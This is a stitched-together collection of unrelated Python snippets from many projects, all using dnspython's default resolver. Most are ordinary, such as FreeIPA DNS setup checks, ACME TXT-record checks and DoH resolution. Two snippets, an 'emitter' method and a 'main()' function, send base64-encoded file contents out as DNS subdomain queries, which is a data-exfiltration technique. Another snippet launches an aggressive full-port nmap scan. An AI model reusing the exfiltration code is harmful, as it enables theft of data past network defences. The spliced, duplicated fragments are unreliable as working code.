def read_dns_forwarders(): addrs = [] if ipautil.user_input("Do you want to configure DNS forwarders?", True): print("Following DNS servers are configured in /etc/resolv.conf: %s" % ", ".join(resolver.get_default_resolver().nameservers)) if ipautil.user_input("Do you want to configure these servers as DNS " "forwarders?", True): addrs = resolver.default_resolver.nameservers[:] print("All DNS servers from /etc/resolv.conf were added. You can " "enter additional addresses now:") while True: ip = ipautil.user_input("Enter an IP address for a DNS forwarder, " "or press Enter to skip", allow_empty=True) if not ip: break try: ip_parsed = ipautil.CheckedIPAddress(ip, parse_netmask=False) except Exception as e: print("Error: Invalid IP Address %s: %s" % (ip, e)) print("DNS forwarder %s not added." % ip) continue print("DNS forwarder %s added. You may add another." % ip) addrs.append(str(ip_parsed)) if not addrs: print("No DNS forwarders configured") return addrs
def get_master_ns(name, server=resolver.get_default_resolver().nameservers[0]): try: response = resolver.resolve(name, "SOA") return response.response.answer[0][0].mname.to_text() except resolver.NoAnswer: try: server_name = gethostbyaddr(server)[0] message, address = query_data(name, server_name, "SOA") response = query.udp(message, address) return response.authority[0].to_rdataset()[0].mname.to_text() except: return False except: return False
def check_one_challenge(challenge: str, token: Optional[str]) -> bool: resolver = get_default_resolver() try: answers = resolver.query(challenge, "TXT") except (NXDOMAIN, NoAnswer): print(f"TXT {challenge} does not exist.") return False except Timeout as e: print(f"Timeout while trying to check TXT {challenge}: {e}") return False else: print(f"TXT {challenge} exists.") if token: validation_answers = [ rdata for rdata in answers for txt_string in rdata.strings if txt_string.decode("utf-8") == token ] if not validation_answers: print(f"TXT {challenge} does not have the expected token value.") return False print(f"TXT {challenge} has the expected token value.") return True
def get_ip_addresses(self): """ Get the IP Addresses from extracted domain names :return: a list of IP addresses (as strings) """ ips = [] solver = None if self.dns_servers is None: solver = resolver.get_default_resolver() else: solver = resolver.Resolver(configure=False) solver.nameservers = self.dns_servers for domain in self.domains: try: ans = solver.query(domain, 'A') except (resolver.NoAnswer, resolver.NXDOMAIN): print >> sys.stderr, "this domain doesn't exist: " + domain exit(2) except resolver.NoNameservers: print >> sys.stderr, "unable to do a dns query, please check your internet connection" exit(3) for a in ans: ips.append((domain, str(a))) return ips
def __init__(self, provider='abuse-contacts.abusix.zone'): ''' Init :param provider: Abuse contact lookup provider :type provider: string ''' self.set_provider(provider) self.resolver = resolver.get_default_resolver()
def __init__(self, provider="abuse-contacts.abusix.org"): """ Init :param provider: Abuse contact lookup provider :type provider: string """ self.set_provider(provider) self.resolver = resolver.get_default_resolver()
def _wait_for_txt_record(self, nameserver: str, min_hits: int = 2, attempts: int = 12) -> None: # This method is expected to be run in an executor. domain = self.txt_record_name() hits = 0 LOG.info("Waiting for TXT Record {}: {} Attempts".format( domain, attempts)) for i in range(attempts): time.sleep(5) # (1) Query for the DNS Record (Answer) resolver = get_default_resolver() resolver.nameservers = [ nameserver, ] try: query = resolver.query(domain, 'TXT') answers = query.response.answer except (NoAnswer, NXDOMAIN): LOG.debug("TXT Record {} Not Found: Attempt {}/{}".format( domain, i + 1, attempts)) continue # (2) Check Answer Content for a in answers: if any(self.txt_record_contents() in str(r) for r in a.items): LOG.debug("Valid TXT Record {} Found on Attempt {}".format( domain, i + 1)) hits += 1 LOG.debug("Number of Hits: {}/{}".format(hits, min_hits)) if hits >= min_hits: return # Minimum Number of Hits Found else: LOG.debug("Invalid TXT Record {} Found on " "Attempt {}/{}".format(domain, i + 1, attempts)) else: if not hits: msg = "Failed to Find Valid Record for {}".format(domain) LOG.error(msg) raise ChallengeFailure(msg) else: msg = "Record {} Only Found {} Times But Required {}".format( domain, hits, min_hits) LOG.error(msg) raise ChallengeFailure(msg)
def __init__(self, provider='abuse-contacts.abusix.org'): ''' Init :param provider: Abuse contact lookup provider :type provider: string ''' self.set_provider(provider) self.resolver = resolver.get_default_resolver()
def resolve(self, message: Message) -> Message: maximum = 4 timeout = 0.4 response_message = 0 if self.name_server == 'internal': self.name_server = resolver.get_default_resolver().nameservers[0] done = False tests = 0 while not done and tests < maximum: try: response_message = query.udp(message, self.name_server, timeout=timeout) done = True except exception.Timeout: tests += 1 return response_message
def _query_srv_records(fqdn): """Query DNS for the SRV records of the fully-qualified domain name specified. :param str fqdn: The fully-qualified domain name to query :rtype: dns.resolver.Answer :raises: SRVQueryFailure """ try: s = resolver.get_default_resolver() s.nameservers = ['8.8.8.8'] return s.query(fqdn, 'SRV') except (resolver.NoAnswer, resolver.NoNameservers, resolver.NotAbsolute, resolver.NoRootSOA, resolver.NXDOMAIN) as error: LOGGER.error('Error querying SRV for %s: %r', fqdn, error) raise SRVQueryFailure(error.__class__.__name__)
def resolve_canonical_challenge_name(name: str) -> str: resolver = get_default_resolver() current_name = name visited = [current_name] while True: try: answer = resolver.resolve(current_name, rdtype=RdataType.CNAME) current_name = str(answer[0].target) if current_name in visited: resolution_map = " -> ".join([*visited, current_name]) raise ValueError( f"Error, CNAME resolution for {current_name} ended in an infinite loop!\n" f"{resolution_map}") visited.append(current_name) except (NXDOMAIN, NoAnswer): # No more CNAME in the chain, we have the final canonical_name return current_name
def resolve(self, message: Message) -> Message: logger = logging.getLogger("doh-server") maximum = 4 timeout = 0.4 response_message = 0 if self.name_server == "internal": self.name_server = resolver.get_default_resolver().nameservers[0] done = False tests = 0 logger.debug("Resolver used: " + str(self.name_server)) while not done and tests < maximum: try: response_message = query.udp(message, self.name_server, timeout=timeout) done = True except exception.Timeout: tests += 1 return response_message
def emitter(self): try: if self.PROPERTIES['resolvers']['Value']: nameservers = [ x.strip() for x in self.PROPERTIES['resolvers']['Value'].split(',') ] nameservers = self.PROPERTIES['resolvers']['Value'].split(',') else: nameservers = get_default_resolver().nameservers for payload in self.encoder(self.payload): try: if self.PROPERTIES['subdomain']['Value']: dnsname = '%s.%s.%s.' % ( self.dnsb64escape(payload), self.PROPERTIES['subdomain']['Value'], self.PROPERTIES['domain']['Value']) else: dnsname = '%s.%s.' % (self.dnsb64escape( payload), self.PROPERTIES['domain']['Value']) print nameservers for ns in nameservers: r = Resolver() r.lifetime = 1 print ns, dnsname r.nameservers = [ns] try: r.query(dnsname, 'A', raise_on_no_answer=False) except Timeout: pass # Timed out, that's fine except Exception as e: self.logger.error('Exception in %s: %s' % (self.__class__.__name__, e)) pass except Exception as e: raise return True
def main(): with open(FILE, 'r') as f: contents = f.read() lines = [contents[i:i + STEP] for i in range(0, len(contents), STEP)] encoded = [ base64.urlsafe_b64encode(bytes(l, 'utf-8')).decode('utf-8') for l in lines ] resolver = res.get_default_resolver() count = 0 for i in range(0, len(encoded), 1): url = '.'.join([str(count), encoded[i], UUID]) count += 1 try: resolver.query(url) except: pass try: resolver.query('.'.join([str(count), 'done', UUID])) except: pass
def __init__(self, service, domain, protocol="tcp", trusted=None, resolver=None, swallow_errors=True): """ Will return an object that will be able to iterate over the results of performing a DNS Query for the SRV records for the requested service. The iterable object will return items based on Priority first, then by Weight in each Priority group. Since there is randomness involved, iterating over the object multiple times will never result in the same order twice. Args: service (str): The service to lookup SRV records for domain (str): The domain the service is associated with protocol (str): Either `tcp` and `udp`, defaults to `tcp` trusted (re): A Regular Expression used to ensure records returned are from a trusted domain resolver (obj): An instance of DNS Python Resolver to point to a custom resolver for DNS queries. swallow_errors (bool): Catch exceptions and swallow them, default is True Example: RobinSRV("jabber", "gmail") Will result in a RobinSRV object for `_jabber._tcp.gmail.com`. """ self.service = "_{}._{}.{}".format(service, protocol, domain) self.trusted = trusted self.resolver = resolver if resolver else get_default_resolver() self.swallow_errors = swallow_errors self.ttl = datetime(1, 1, 1) self.groups = [] self.log = logging.getLogger(__name__)
def get_nameservers(force_update=False): if force_update: resolver.default_resolver = resolver.Resolver() return resolver.get_default_resolver().nameservers
cmd = ArgumentParser(description="Probes a DNS server by requesting the SOA record") cmd.add_argument("-name", help="Name to resolve. Default is the local host's domain", default=getfqdn().split(".", 1)[-1]) cmd.add_argument("-servers", help="Space separated list of name servers. Default is 127.0.0.1", default="127.0.0.1") cmd.add_argument("-v", help="Verbose messaging", action="store_true", default=False) cmd.add_argument("-version", help="Print version and exit", action="store_true", default=False) args = cmd.parse_args() if args.version: print(_FILE_VER) sys.exit() args.servers = args.servers.split() vmsg = verbose(args.v) resolver.get_default_resolver().nameservers = args.servers resolver.get_default_resolver().lifetime = DNS_TIMEOUT vmsg("Resolving {}".format(args.name)) vmsg("Using name servers {}".format(resolver.get_default_resolver().nameservers)) try: resolver.query(args.name, rdatatype.SOA) except exception.Timeout: print(DNS_TIMEOUT_MESSAGE, end="") except resolver.NXDOMAIN: print(DNS_NOTFOUND_MESSAGE, end="") except exception.DNSException: print(DNS_ERROR_MESSAGE, end="") else: print(OK_MESSAGE, end="")
def install_check(standalone, api, replica, options, hostname): global ip_addresses global reverse_zones fstore = sysrestore.FileStore(paths.SYSRESTORE) if not ipautil.file_exists(paths.IPA_DNS_INSTALL): raise RuntimeError("Integrated DNS requires '%s' package" % constants.IPA_DNS_PACKAGE_NAME) # when installing first DNS instance we need to check zone overlap if replica or standalone: already_enabled = api.Command.dns_is_enabled()['result'] else: already_enabled = False if not already_enabled: domain = dnsutil.DNSName(util.normalize_zone(api.env.domain)) print("Checking DNS domain %s, please wait ..." % domain) try: dnsutil.check_zone_overlap(domain, raise_on_error=False) except ValueError as e: if options.force or options.allow_zone_overlap: root_logger.warning("%s Please make sure that the domain is " "properly delegated to this IPA server.", e.message) else: raise e for reverse_zone in options.reverse_zones: try: dnsutil.check_zone_overlap(reverse_zone) except ValueError as e: if options.force or options.allow_zone_overlap: root_logger.warning(e.message) else: raise e if standalone: print("==============================================================================") print("This program will setup DNS for the FreeIPA Server.") print("") print("This includes:") print(" * Configure DNS (bind)") print(" * Configure SoftHSM (required by DNSSEC)") print(" * Configure ipa-dnskeysyncd (required by DNSSEC)") if options.dnssec_master: print(" * Configure ipa-ods-exporter (required by DNSSEC key master)") print(" * Configure OpenDNSSEC (required by DNSSEC key master)") print(" * Generate DNSSEC master key (required by DNSSEC key master)") elif options.disable_dnssec_master: print(" * Unconfigure ipa-ods-exporter") print(" * Unconfigure OpenDNSSEC") print("") print("No new zones will be signed without DNSSEC key master IPA server.") print("") print(("Please copy file from %s after uninstallation. This file is needed " "on new DNSSEC key " % paths.IPA_KASP_DB_BACKUP)) print("master server") print("") print("NOTE: DNSSEC zone signing is not enabled by default") print("") if options.dnssec_master: print("Plan carefully, replacing DNSSEC key master is not recommended") print("") print("") print("To accept the default shown in brackets, press the Enter key.") print("") if (options.dnssec_master and not options.unattended and not ipautil.user_input( "Do you want to setup this IPA server as DNSSEC key master?", False)): sys.exit("Aborted") elif (options.disable_dnssec_master and not options.unattended and not ipautil.user_input( "Do you want to disable current DNSSEC key master?", False)): sys.exit("Aborted") if options.disable_dnssec_master: _is_master() if options.disable_dnssec_master or options.dnssec_master: dnssec_zones = _find_dnssec_enabled_zones(api.Backend.ldap2) if options.disable_dnssec_master: if dnssec_zones and not options.force: raise RuntimeError( "Cannot disable DNSSEC key master, DNSSEC signing is still " "enabled for following zone(s):\n" "%s\n" "It is possible to move DNSSEC key master role to a different " "server by using --force option to skip this check.\n\n" "WARNING: You have to immediatelly copy kasp.db file to a new " "server and run command 'ipa-dns-install --dnssec-master " "--kasp-db'.\n" "Your DNS zones will become unavailable if you " "do not reinstall the DNSSEC key master role immediatelly." % ", ".join([str(zone) for zone in dnssec_zones])) elif options.dnssec_master: ods = opendnssecinstance.OpenDNSSECInstance(fstore) ods.realm = api.env.realm dnssec_masters = ods.get_masters() # we can reinstall current server if it is dnssec master if dnssec_masters and api.env.host not in dnssec_masters: print("DNSSEC key master(s):", u','.join(dnssec_masters)) raise ScriptError( "Only one DNSSEC key master is supported in current version.") if options.kasp_db_file: dnskeysyncd = services.service('ipa-dnskeysyncd') if not dnskeysyncd.is_installed(): raise RuntimeError("ipa-dnskeysyncd is not configured on this " "server, you cannot reuse OpenDNSSEC " "database (kasp.db file)") # check if replica can be the DNSSEC master cmd = [paths.IPA_DNSKEYSYNCD_REPLICA] environment = { "SOFTHSM2_CONF": paths.DNSSEC_SOFTHSM2_CONF, } # stop dnskeysyncd before test dnskeysyncd_running = dnskeysyncd.is_running() dnskeysyncd.stop() try: ipautil.run(cmd, env=environment, runas=constants.ODS_USER, suplementary_groups=[constants.NAMED_GROUP]) except CalledProcessError as e: root_logger.debug("%s", e) raise RuntimeError("This IPA server cannot be promoted to " "DNSSEC master role because some keys were " "not replicated from the original " "DNSSEC master server") finally: if dnskeysyncd_running: dnskeysyncd.start() elif dnssec_zones and not options.force: # some zones have --dnssec=true, make sure a user really want to # install new database raise RuntimeError( "DNSSEC signing is already enabled for following zone(s): %s\n" "Installation cannot continue without the OpenDNSSEC database " "file from the original DNSSEC master server.\n" "Please use option --kasp-db to specify location " "of the kasp.db file copied from the original " "DNSSEC master server.\n" "WARNING: Zones will become unavailable if you do not provide " "the original kasp.db file." % ", ".join([str(zone) for zone in dnssec_zones])) ip_addresses = get_server_ip_address(hostname, options.unattended, True, options.ip_addresses) util.network_ip_address_warning(ip_addresses) util.broadcast_ip_address_warning(ip_addresses) if not options.forward_policy: # user did not specify policy, derive it: default is 'first' but # if any of local IP addresses belongs to private ranges use 'only' options.forward_policy = 'first' for ip in ip_addresses: if dnsutil.inside_auto_empty_zone(dnsutil.DNSName(ip.reverse_dns)): options.forward_policy = 'only' root_logger.debug('IP address %s belongs to a private range, ' 'using forward policy only', ip) break if options.no_forwarders: options.forwarders = [] elif options.forwarders or options.auto_forwarders: if not options.forwarders: options.forwarders = [] if options.auto_forwarders: options.forwarders += resolver.get_default_resolver().nameservers elif standalone or not replica: options.forwarders = read_dns_forwarders() # test DNSSEC forwarders if options.forwarders: if (not bindinstance.check_forwarders(options.forwarders, root_logger) and not options.no_dnssec_validation): options.no_dnssec_validation = True print("WARNING: DNSSEC validation will be disabled") root_logger.debug("will use DNS forwarders: %s\n", options.forwarders) if not standalone: search_reverse_zones = False else: search_reverse_zones = True if not standalone and replica: reverse_zones_unattended_check = True else: reverse_zones_unattended_check = options.unattended reverse_zones = bindinstance.check_reverse_zones( ip_addresses, options.reverse_zones, options, reverse_zones_unattended_check, search_reverse_zones ) if reverse_zones: print("Using reverse zone(s) %s" % ', '.join(reverse_zones))
except: print("Install colorama and dnspython modules using pip3") exit() init() already_done = {} ip_4 = [] ip_6 = [] maximum_recursion_depth = 20 name_servers = { '8.8.8.8': None, '8.8.4.4': None, '208.67.222.222': None, '208.67.220.220': None } for name_server in get_default_resolver().nameservers: name_servers[name_server] = None ADDITIONAL_RDCLASS = 65535 all_ids = [ 'NONE', 'A', 'NS', 'MD', 'MF', 'CNAME', 'SOA', 'MB', 'MG', 'MR', 'NULL', 'WKS', 'PTR', 'HINFO', 'MINFO', 'MX', 'TXT', 'RP', 'AFSDB', 'X25', 'ISDN', 'RT', 'NSAP', 'NSAP-PTR', 'SIG', 'KEY', 'PX', 'GPOS', 'AAAA', 'LOC', 'NXT', 'SRV', 'NAPTR', 'KX', 'CERT', 'A6', 'DNAME', 'OPT', 'APL', 'DS', 'SSHFP', 'IPSECKEY', 'RRSIG', 'NSEC', 'DNSKEY', 'DHCID', 'NSEC3', 'NSEC3PARAM', 'TLSA', 'HIP', 'CDS', 'CDNSKEY', 'CSYNC', 'SPF', 'UNSPEC', 'EUI48', 'EUI64', 'TKEY', 'TSIG', 'IXFR', 'AXFR', 'MAILB', 'MAILA', 'ANY', 'URI', 'CAA', 'TA', 'DLV' ]
def execute(self): data = dict() ip_list = [] cname_list = [] mx_list = [] ns_list = [] # terminal_request_send_time self.terminal_request_send_time = time.time() self.parameters["terminal_request_send_time"] = self.terminal_request_send_time if self.dns_server: try: dns_query = dns.message.make_query(qname=self.destination, rdtype=self.rdtype) querya = dns.query.udp(dns_query, self.dns_server, timeout=self.dns_timeout) data_ptime = querya.time * 1000 answer = querya.answer except dns.exception.Timeout as e: logger.exception("dns timeout exception") return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_timeout_error() except (resolver.NXDOMAIN, socket.gaierror) as e: logger.exception("dns server exception") return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_server_error() else: dns_servers = resolver.get_default_resolver().nameservers if not dns_servers: logger.error("do not have dns servers") return DnsError(url=self.destination, parameters=self.parameters).miss_default_error() dns_query = dns.message.make_query(qname=self.destination, rdtype=self.rdtype) timeout_flag = 0 dns_server_flag = 0 for dns_server in dns_servers: try: querya = dns.query.udp(dns_query, dns_server, timeout=self.dns_timeout) data_ptime = querya.time * 1000 answer = querya.answer self.dns_server = dns_server break except dns.exception.Timeout as e: logger.exception("dns server {} got timeout exception".format(str(dns_server))) timeout_flag += 1 if timeout_flag + dns_server_flag == len(dns_servers): return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_timeout_error() except (resolver.NXDOMAIN, socket.gaierror) as e: logger.exception("dns server {} got server exception".format(str(dns_server))) dns_server_flag += 1 if timeout_flag + dns_server_flag == len(dns_servers): return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_server_error() self.terminal_response_receive_time = time.time() ipt = IpLocation(self.parameters) for queryans in answer: for item in queryans.items: # A记录 又称IP指向 if item.rdtype == rdatatype.A: ip_dict = dict() ip = item.address ip_dict["ip"] = ip location = ipt.get_location(ip) ip_dict["location"] = location ip_list.append(ip_dict) # CNAME 通常称别名指向 elif item.rdtype == rdatatype.CNAME: cname_list.append(str(item.target)) # MAIL记录 elif item.rdtype == rdatatype.MX: mx_list.append(str(item.exchange)) # NS记录 elif item.rdtype == rdatatype.NS: ns_list.append(str(item.target)) if self.dns_method == "mx": if mx_list: data["mxs"] = mx_list else: return DnsError(url=self.destination, parameters=self.parameters).dns_query_error() elif self.dns_method == "a": if ip_list: data["ips"] = ip_list else: return DnsError(url=self.destination, parameters=self.parameters).dns_query_error() elif self.dns_method == "ns": if ns_list: data["ns"] = ns_list else: return DnsError(url=self.destination, parameters=self.parameters).dns_query_error() elif self.dns_method == "cname": if cname_list: data["cnames"] = cname_list else: return DnsError(url=self.destination, parameters=self.parameters).dns_query_error() else: return DnsError(url=self.destination, parameters=self.parameters).dns_query_error() data["destination"] = self.destination data["ptime"] = data_ptime data["dns_server"] = dict() data["dns_server"]["ip"] = self.dns_server data["dns_server"]["location"] = ipt.get_location(self.dns_server) result = { "status": 0, "data": data, "stamp": { "server_request_generate_time": self.server_request_generate_time, "terminal_request_receive_time": self.terminal_request_receive_time, "terminal_request_send_time": self.terminal_request_send_time, "terminal_response_receive_time": self.terminal_response_receive_time, } } return result
if __name__ == "__main__": parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description='Compare resolution performance of RDNS') parser.add_argument('-o', '--output', default=sys.stdout, type=argparse.FileType('w'), help='output file') parser.add_argument('-c', '--csv', default=None, type=argparse.FileType('w'), help='csv output file for detailed results') parser.add_argument('-b', '--bind', default=':0', help='binding interface') parser.add_argument('-n', '--names', default=1000, type=int, help='number of hostnames to use in testing') parser.add_argument('-s', '--sanity', default=None, help='override url for the sanity list of hostnames') parser.add_argument('-p', '--popular', default=None, help='override url for the popular list of hostnames') parser.add_argument('-r', '--recursives', default=None, help='override url for the list of recursive dns servers') parser.add_argument('-a', '--additional', nargs='+', default=[], help='IP addresses of additional recursive resolvers') parser.add_argument('-i', '--inuse', action='store_true', default=False, help='include the system configured recursive resolver') parser.add_argument('--progress', action='store_true', default=False, help='report progress updates') args = parser.parse_args() hostname,port = args.bind.split(':') bind = (hostname, int(port)) source = Input(args.popular, args.sanity, args.recursives) for additional in args.additional: service = Service(additional) service.recursives.append(Recursive(additional, service)) source.recursives.append(service) if args.inuse: service = Service('inuse') for nameserver in dr.get_default_resolver().nameservers: service.recursives.append(Recursive(nameserver, service)) source.recursives.append(service) source.popular = source.popular[:args.names] main(bind, source, args.output, args.csv, args.progress)
import re import statistics import string import sys import time from random import randint import click import yaml from dns import rdataclass, rdatatype, resolver tlds = [ 'com', 'org', 'co.uk', 'net', 'ca', 'de', 'jp', 'fr', 'au', 'us', 'at', 'ch', 'it', 'nl', 'io' ] local_servers = list(resolver.get_default_resolver().nameservers) if len( resolver.get_default_resolver().nameservers) > 0 else ['127.0.0.1'] def random_string(size=6, chars=string.ascii_lowercase + string.digits): """generate random string in a given range""" return ''.join(random.choice(chars) for _ in range(size)) def reset_line_print(x): """reset the current line in a shell if interactive, else print normally""" if sys.stdout.isatty(): print('\x1b[2K' + x, end='\r') else: print(x) sys.stdout.flush()
def main(): parser = ArgumentParser() parser.add_argument("name", type=str, help="Scan name.") group = parser.add_mutually_exclusive_group(required=True) group.add_argument("-t", "--target", type=str, nargs="+", help="Target hostnames, IP addresses, networks, etc.") group.add_argument("-iL", "--target-list", type=FileType("r"), help="Input from list of hosts/networks.") parser.add_argument("-ns", "--nameservers", type=str, nargs="+", help="Specify custom DNS servers.", default=get_default_resolver().nameservers) parser.add_argument( "-d", "--datadir", type=str, help="Specify custom Nmap data file location and output directory.", default="./nmap/") parser.add_argument("-r", "--resume", action="store_true", help="Resume previous scan.") args = parser.parse_args() if args.target_list: args.target_list.close() targets = " ".join( args.target) if args.target else f"-iL {args.target_list.name}" output = args.name datadir = path.abspath(args.datadir).replace("\\", "/") if datadir[-1] != "/": datadir += "/" outdir = path.join(datadir, f"{output}/") try: makedirs(outdir) except FileExistsError: pass try: with open(path.join(datadir, "nse-args.lst")) as base: with open(path.join(outdir, "nse-args.lst"), "w") as new: new.write(base.read().format(datadir=datadir, outdir=outdir)) except FileNotFoundError: with open(path.join(outdir, "nse-args.lst"), "w") as new: new.write("newtargets\n") blacklist = filter( None, map( str.strip, """ broadcast brute dos fuzzer asn-query ip-geolocation-* http-google-malware http-virustotal http-comments-displayer http-fetch http-xssed targets-* whois-ip http-icloud-* """.split())) scripts = f"all and not {' and not '.join(blacklist)}" # stylesheet https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl command = (f"nmap --resume {path.join(outdir, 'sCSUV-OT.xml')}" if args.resume else " ".join( filter( None, map( str.strip, f""" nmap {targets} --datadir "{datadir}" --dns-servers "{','.join(args.nameservers)}" --traceroute --reason -sS -sU -p1-65535 -sV --version-all -O --osscan-guess --script "{scripts}" --script-args-file "{path.join(outdir, 'nse-args.lst')}" --min-rate 65535 --min-hostgroup 256 --max-hostgroup 2048 --min-parallelism 256 --stats-every 1m -oA "{path.join(outdir, 'sCSUV-OT')}" --webxml """.split("\n"))))) #--script-timeout 8m #--datadir "~/nmap/" --system-dns --traceroute --reason -sS -sU -p1-65535 -sV --version-all --osscan-guess --min-rate 65536 --max-rate 67108864 --min-parallelism 256 -oA "~/nmap/179.189.95.128" --webxml --script "external and not broadcast and not brute and not dos and not fuzzer and not intrusive and not asn-query and not clamav-exec and not ip-geolocation-* and not ipidseq and not hostmap-* and not http-google-malware and not http-virustotal and not http-comments-displayer and not http-fetch and not http-vuln-cve2014-212* and not targets-* and not whois-ip" --script-args-file "~/nmap/nse-args.lst" --script-timeout 16m #print(command) #exit() system(command)
def dns_resolver(): resolver = get_default_resolver() resolver.cache = LRUCache() return resolver
default=[], help='IP addresses of additional recursive resolvers') parser.add_argument( '-i', '--inuse', action='store_true', default=False, help='include the system configured recursive resolver') parser.add_argument('--progress', action='store_true', default=False, help='report progress updates') args = parser.parse_args() hostname, port = args.bind.split(':') bind = (hostname, int(port)) source = Input(args.popular, args.sanity, args.recursives) for additional in args.additional: service = Service(additional) service.recursives.append(Recursive(additional, service)) source.recursives.append(service) if args.inuse: service = Service('inuse') for nameserver in dr.get_default_resolver().nameservers: service.recursives.append(Recursive(nameserver, service)) source.recursives.append(service) source.popular = source.popular[:args.names] main(bind, source, args.output, args.csv, args.progress)
def install_check(standalone, api, replica, options, hostname): global ip_addresses global reverse_zones fstore = sysrestore.FileStore(paths.SYSRESTORE) if not os.path.isfile(paths.IPA_DNS_INSTALL): raise RuntimeError("Integrated DNS requires '%s' package" % constants.IPA_DNS_PACKAGE_NAME) # when installing first DNS instance we need to check zone overlap if replica or standalone: already_enabled = api.Command.dns_is_enabled()['result'] else: already_enabled = False if not already_enabled: domain = dnsutil.DNSName(util.normalize_zone(api.env.domain)) print("Checking DNS domain %s, please wait ..." % domain) try: dnsutil.check_zone_overlap(domain, raise_on_error=False) except ValueError as e: if options.force or options.allow_zone_overlap: logger.warning("%s Please make sure that the domain is " "properly delegated to this IPA server.", e) else: raise e for reverse_zone in options.reverse_zones: try: dnsutil.check_zone_overlap(reverse_zone) except ValueError as e: if options.force or options.allow_zone_overlap: logger.warning('%s', six.text_type(e)) else: raise e if standalone: print("==============================================================================") print("This program will setup DNS for the FreeIPA Server.") print("") print("This includes:") print(" * Configure DNS (bind)") print(" * Configure SoftHSM (required by DNSSEC)") print(" * Configure ipa-dnskeysyncd (required by DNSSEC)") if options.dnssec_master: print(" * Configure ipa-ods-exporter (required by DNSSEC key master)") print(" * Configure OpenDNSSEC (required by DNSSEC key master)") print(" * Generate DNSSEC master key (required by DNSSEC key master)") elif options.disable_dnssec_master: print(" * Unconfigure ipa-ods-exporter") print(" * Unconfigure OpenDNSSEC") print("") print("No new zones will be signed without DNSSEC key master IPA server.") print("") print(("Please copy file from %s after uninstallation. This file is needed " "on new DNSSEC key " % paths.IPA_KASP_DB_BACKUP)) print("master server") print("") print("NOTE: DNSSEC zone signing is not enabled by default") print("") if options.dnssec_master: print("Plan carefully, replacing DNSSEC key master is not recommended") print("") print("") print("To accept the default shown in brackets, press the Enter key.") print("") if (options.dnssec_master and not options.unattended and not ipautil.user_input( "Do you want to setup this IPA server as DNSSEC key master?", False)): sys.exit("Aborted") elif (options.disable_dnssec_master and not options.unattended and not ipautil.user_input( "Do you want to disable current DNSSEC key master?", False)): sys.exit("Aborted") if options.disable_dnssec_master: _is_master() if options.disable_dnssec_master or options.dnssec_master: dnssec_zones = _find_dnssec_enabled_zones(api.Backend.ldap2) if options.disable_dnssec_master: if dnssec_zones and not options.force: raise RuntimeError( "Cannot disable DNSSEC key master, DNSSEC signing is still " "enabled for following zone(s):\n" "%s\n" "It is possible to move DNSSEC key master role to a different " "server by using --force option to skip this check.\n\n" "WARNING: You have to immediately copy kasp.db file to a new " "server and run command 'ipa-dns-install --dnssec-master " "--kasp-db'.\n" "Your DNS zones will become unavailable if you " "do not reinstall the DNSSEC key master role immediately." % ", ".join([str(zone) for zone in dnssec_zones])) elif options.dnssec_master: ods = opendnssecinstance.OpenDNSSECInstance(fstore) ods.realm = api.env.realm dnssec_masters = ods.get_masters() # we can reinstall current server if it is dnssec master if dnssec_masters and api.env.host not in dnssec_masters: print("DNSSEC key master(s):", u','.join(dnssec_masters)) raise ScriptError( "Only one DNSSEC key master is supported in current version.") if options.kasp_db_file: dnskeysyncd = services.service('ipa-dnskeysyncd', api) if not dnskeysyncd.is_installed(): raise RuntimeError("ipa-dnskeysyncd is not configured on this " "server, you cannot reuse OpenDNSSEC " "database (kasp.db file)") # check if replica can be the DNSSEC master cmd = [paths.IPA_DNSKEYSYNCD_REPLICA] environment = { "SOFTHSM2_CONF": paths.DNSSEC_SOFTHSM2_CONF, } # stop dnskeysyncd before test dnskeysyncd_running = dnskeysyncd.is_running() dnskeysyncd.stop() try: ipautil.run(cmd, env=environment, runas=constants.ODS_USER, suplementary_groups=[constants.NAMED_GROUP]) except CalledProcessError as e: logger.debug("%s", e) raise RuntimeError("This IPA server cannot be promoted to " "DNSSEC master role because some keys were " "not replicated from the original " "DNSSEC master server") finally: if dnskeysyncd_running: dnskeysyncd.start() elif dnssec_zones and not options.force: # some zones have --dnssec=true, make sure a user really want to # install new database raise RuntimeError( "DNSSEC signing is already enabled for following zone(s): %s\n" "Installation cannot continue without the OpenDNSSEC database " "file from the original DNSSEC master server.\n" "Please use option --kasp-db to specify location " "of the kasp.db file copied from the original " "DNSSEC master server.\n" "WARNING: Zones will become unavailable if you do not provide " "the original kasp.db file." % ", ".join([str(zone) for zone in dnssec_zones])) ip_addresses = get_server_ip_address(hostname, options.unattended, True, options.ip_addresses) util.no_matching_interface_for_ip_address_warning(ip_addresses) if not options.forward_policy: # user did not specify policy, derive it: default is 'first' but # if any of local IP addresses belongs to private ranges use 'only' options.forward_policy = 'first' for ip in ip_addresses: if dnsutil.inside_auto_empty_zone(dnsutil.DNSName(ip.reverse_dns)): options.forward_policy = 'only' logger.debug('IP address %s belongs to a private range, ' 'using forward policy only', ip) break if options.no_forwarders: options.forwarders = [] elif options.forwarders or options.auto_forwarders: if not options.forwarders: options.forwarders = [] if options.auto_forwarders: options.forwarders += resolver.get_default_resolver().nameservers elif standalone or not replica: options.forwarders = read_dns_forwarders() # test DNSSEC forwarders if options.forwarders: if (not bindinstance.check_forwarders(options.forwarders) and not options.no_dnssec_validation): options.no_dnssec_validation = True print("WARNING: DNSSEC validation will be disabled") logger.debug("will use DNS forwarders: %s\n", options.forwarders) if not standalone: search_reverse_zones = False else: search_reverse_zones = True if not standalone and replica: reverse_zones_unattended_check = True else: reverse_zones_unattended_check = options.unattended reverse_zones = bindinstance.check_reverse_zones( ip_addresses, options.reverse_zones, options, reverse_zones_unattended_check, search_reverse_zones ) if reverse_zones: print("Using reverse zone(s) %s" % ', '.join(reverse_zones))
